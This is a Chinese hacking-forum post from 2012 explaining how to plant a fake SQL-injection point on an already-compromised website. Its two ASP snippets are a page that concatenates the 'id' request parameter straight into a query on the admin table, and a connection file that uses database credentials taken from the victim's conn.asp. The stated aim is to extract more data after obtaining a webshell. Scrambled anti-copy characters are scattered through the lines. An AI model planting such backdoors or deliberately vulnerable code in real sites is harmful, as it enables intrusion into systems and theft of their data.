找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1861|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵/ Y: f5 ~+ k9 S7 ]

1 S' c$ P# b9 R8 A) O今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息; Q' m9 u8 ~3 ^8 K
9 M0 C/ {  z7 J0 h0 a( t
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!( t8 j2 I1 k' j9 p
6 c" h. q! M2 u0 L4 P5 q
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
0 y# d9 U* |: A7 V* n
. L. d; u# y% z8 h: m1 W+ g密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表* G& y, z& w" I$ `. `) X& v) T
+ Z; \& Q5 @/ ?2 }" |) a
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:' K2 {: d) ]& I3 P

# ^( N3 q' e0 A2 f  @! q程序代码- W4 V% J# G1 N0 `! J
<!--#include file="xx.asp"-->4 M- F  K% Y: h7 Q7 o) q
<%
4 H0 K0 p. g- h9 pset rs=server.createobject("ADODB.recordset")1 F' f$ x" q6 h5 a, m' S
id = request("id")0 L/ a1 I& u0 o9 G8 R& i/ d
strSQL = "select * from admin where id=" & id
3 i. n( F% e# d; r9 v+ b/ grs.open strSQL,conn,1,3# {% ?, z; N  K2 J* C" Z7 l; Q
rs.close# t' [1 y; W) T# ?" r% O
%>
( e2 L4 z8 Y+ |* s) O8 Q' Q8 o/ o1 J& \& A& h$ m( |" A
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
( Y( z; F# [; p! N- F5 o: Q% ~/ K  P( g5 N( x) z" N! o6 o. \9 u
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
4 t. m) H3 F# r4 L7 I) W7 @
9 z8 G1 N4 y. l然后就要构造一个连接数据库的文件了,代码如下:
9 a, Y  ]+ i! G, k: }' w% Q" a程序代码
8 j* `! I9 u$ C9 ^, j<%        % F. r- S  b5 l) B
strSQLServerName = "000.000.000.000"     '服务器名称或地址
8 q+ u3 u, H) k  Y( A  \9 U/ B/ SstrSQLDBUserName = "sqlname"         '数据库帐号. m6 g# v/ o) x2 A: H- u
strSQLDBPassword = "sqlpass"         '数据库密码
: m" `" }( F$ a* ^strSQLDBName = "sqldataname"           '数据库名称
" g" X3 U9 G9 i+ F' y# f4 LSet conn = Server.CreateObject("ADODB.Connection")
% M( K. ?, |  y7 f- S- LstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
8 n. H, d$ b% V, f7 j# R/ q. Oconn.open strCon
% J& ]# ~+ R1 }' N( c5 D, @%>' V' ], w! q! a- M

; H1 }) n0 O3 ^$ q8 Y这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
4 r6 A* D; E1 W2 k$ k% j  [
$ @: D- B3 ?$ L- X5 [就这样,正常情况下,就OK了,伪造成功……
5 g( ?$ B7 o+ Y# o
% n; {' v, F& k: N           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表